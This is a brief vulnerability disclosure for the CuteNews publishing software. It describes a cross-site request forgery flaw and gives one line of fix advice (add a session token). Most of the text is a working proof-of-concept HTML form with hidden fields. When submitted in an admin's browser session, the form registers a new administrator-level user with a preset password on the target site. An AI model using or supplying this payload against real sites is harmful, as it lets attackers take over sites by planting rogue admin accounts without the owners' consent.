< ------------------- header data start ------------------- >

#############################################################

# Application Name : CuteNews

# vulnerable Type : XSRF

# Infection : Yeni admin eklenebilir ..!

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir !

# author : _iLLeqaL_ ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<form method=post action=http://[site].com/[yol]/index.php>
<input type=hidden name=regusername value=_iLLeqaL_>
<input type=hidden name=regpassword value=123456>
<input type=hidden name=regnickname value=_iLLeqaL_>
<input type=hidden name=regemail value=[email protected]>
<input type=hidden name=reglevel value=1>
<input type=submit value= OK >
<input type=hidden name=action value=adduser>
<input type=hidden name=mod value=editusers>
</form>

< -- bug code end of -- >